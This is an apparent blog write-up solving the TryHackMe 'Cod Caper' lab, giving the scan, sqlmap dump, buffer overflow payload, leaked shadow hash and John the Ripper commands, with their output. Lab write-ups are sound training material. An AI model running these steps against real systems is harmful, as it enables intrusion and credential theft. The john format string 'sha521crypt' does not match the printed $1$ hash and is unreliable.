Categories
Write-Ups

The Cod Caper (WU)

In this blog post, I’ll cover Te Cod Caper. A box from THM which claims to be for beginners. We’ll see step by step how to solve it. I higly recommend you to do it before reading this post.

This write-up may be intended only for those who already finished this box. However, you can have a quick look at it if you’re totally lost.

This box can be found at (login required) : https://tryhackme.com/room/thecodcaper

The Cod Caper banner from TryHackMe.
Credit: TryHackMe

I – Host enumeration

For this part, I’m using this command :

nmap -p 1-1000 -sV -sS <ip>

-p 1-1000 => Scan only the 1000 first ports

-sV => Get the services’ version (as we’re blind for now, I expected to find a vulnerable service with a CVE)

-sS => Perform a SYN-STEALTH scan

Here is the output of the scan :

Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-08 18:40 CEST
Nmap scan report for 10.10.212.142
Host is up (0.029s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.34 seconds

From this output, we can have all the informmation needed to answer the three following questions :

Question 1

We have 2 ports opened on this machine : 22 & 80

Question 2

The webpage’s (http:///index.html) title is “Apache2 Ubuntu Default Page: It works”

Question 3

The SSH version is OpenSSH 7.2p2 Ubuntu 4ubuntu2.8

II – Web Enumeration

For this part, I used gobuster as suggested as long as dirb doesn’t handle files but only directories.

gobuster dir -x php,txt,html --wordlist /usr/share/wordlists/dirb/big.txt --url <ip>

Please note that the path I’m using here only works for the Kali distro. You may need to download it manually if your distro doesn’t come with it natively.

===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.212.142
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/big.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     php,txt,html                                                                                                                                                                                                           
[+] Timeout:        10s                                                                                                                                                                                                                    
===============================================================                                                                                                                                                                            
2020/04/08 18:48:50 Starting gobuster                                                                                                                                                                                                      
===============================================================                                                                                                                                                                            
/.htaccess (Status: 403)
/.htaccess.html (Status: 403)
/.htaccess.php (Status: 403)
/.htaccess.txt (Status: 403)
/.htpasswd (Status: 403)
/.htpasswd.php (Status: 403)
/.htpasswd.txt (Status: 403)
/.htpasswd.html (Status: 403)
/administrator.php (Status: 200)

I stopped the script as soon as I saw the administrator.php file : I knew it was the ‘important file’ of the server.

III – Web Exploitation

As I knew their won’t be many records in the database, I didn’t use the -all sub-flag.

My exploiting command was tho :

sqlmap -u <ip>/administrator.php --forms --dump

Then we have the 2 credentials that appears… magically :p.

IV – Command Execution

Firstly, I want to say a big thanks to Psyrkoz#0405 & MuirlandOracle#2721 who debugged me. In fact, This part was the most costful in time on the whole box.

At a glance, I think everyone would use this command :

find /* -user pingu

But We have many other users and here www-data is our candidate !

find /* -user www-data

is returning us

 /var/hidden/pass 

on its last line, which clearly shows us the way to go !

V – LinEnum

To ‘inject’ LinEdum into the system, I ran into a rough and raw solution (that I don’t recommend even if I used it) : Copy/Paste the content of linenum.sh through a SSH session (now we have the SSH password of Pingu, let’s exploit it !).

Then I ran this command :

chmod +x ./linenum.sh
./linenum.sh | grep SUID -A30

And as a part of the output, we find this :

[-] SUID files:
-r-sr-xr-x 1 root papa 7516 Jan 16 21:07 /opt/secret/root
-rwsr-xr-x 1 root root 136808 Jul  4  2017 /usr/bin/sudo
-rwsr-xr-x 1 root root 10624 May  8  2018 /usr/bin/vmware-user-suid-wrapper
-rwsr-xr-x 1 root root 40432 May 16  2017 /usr/bin/chsh
-rwsr-xr-x 1 root root 54256 May 16  2017 /usr/bin/passwd
-rwsr-xr-x 1 root root 75304 May 16  2017 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 39904 May 16  2017 /usr/bin/newgrp
-rwsr-xr-x 1 root root 49584 May 16  2017 /usr/bin/chfn
-rwsr-xr-x 1 root root 428240 Mar  4  2019 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 10232 Mar 27  2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-- 1 root messagebus 42992 Jan 12  2017 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 44168 May  7  2014 /bin/ping
-rwsr-xr-x 1 root root 40128 May 16  2017 /bin/su
-rwsr-xr-x 1 root root 44680 May  7  2014 /bin/ping6
-rwsr-xr-x 1 root root 142032 Jan 28  2017 /bin/ntfs-3g
-rwsr-xr-x 1 root root 40152 May 16  2018 /bin/mount
-rwsr-xr-x 1 root root 30800 Jul 12  2016 /bin/fusermount
-rwsr-xr-x 1 root root 27608 May 16  2018 /bin/umount

As we can see, the first line looks pretty… unusual and it is : It’s the answer of this part !

VI – Binary-Exploitation

I choosed to pass through the manual version of this part so I’ll not cover the python part. In fact, the explanation is alreadyb a write-up to it.

After playing a bit with gdb, it looks like the size of our payload has to be 44 chars. Even if it’s said, I really encourage you to (re)discover it by yourself.

Then, to access our shell function, I’ve just pasted the python command they give us :

python -c 'print "A"*44 + "\xcb\x84\x04\x08"' | /opt/secret/root

Which give us an output like this :

daemon:*:17953:0:99999:7:::
bin:*:17953:0:99999:7:::
sys:*:17953:0:99999:7:::
sync:*:17953:0:99999:7:::
games:*:17953:0:99999:7:::
man:*:17953:0:99999:7:::
lp:*:17953:0:99999:7:::
mail:*:17953:0:99999:7:::
news:*:17953:0:99999:7:::
uucp:*:17953:0:99999:7:::
proxy:*:17953:0:99999:7:::
www-data:*:17953:0:99999:7:::
backup:*:17953:0:99999:7:::
list:*:17953:0:99999:7:::
irc:*:17953:0:99999:7:::
gnats:*:17953:0:99999:7:::
nobody:*:17953:0:99999:7:::
systemd-timesync:*:17953:0:99999:7:::
systemd-network:*:17953:0:99999:7:::
systemd-resolve:*:17953:0:99999:7:::
systemd-bus-proxy:*:17953:0:99999:7:::
syslog:*:17953:0:99999:7:::
_apt:*:17953:0:99999:7:::
messagebus:*:18277:0:99999:7:::
uuidd:*:18277:0:99999:7:::
papa:$1$ORU43el1$tgY7epqx64xDbXvvaSEnu.:18277:0:99999:7:::

VII – Password Cracking

I used John The Ripper (as I get used to it) and the command looks something like this :

john --format=sha521crypt -w /usr/share/wordlists/rockyou.txt papa.hash

And there you are : Root password is owned !

VIII – Conclusion

I found this box pretty easy even if I stuck on the command execution part. A good complement for it would be Vulnversity, which has the same approach for beginners. By the way, I you found any error or have any improvment to share with this write-up, I’m waiting for your PRs :p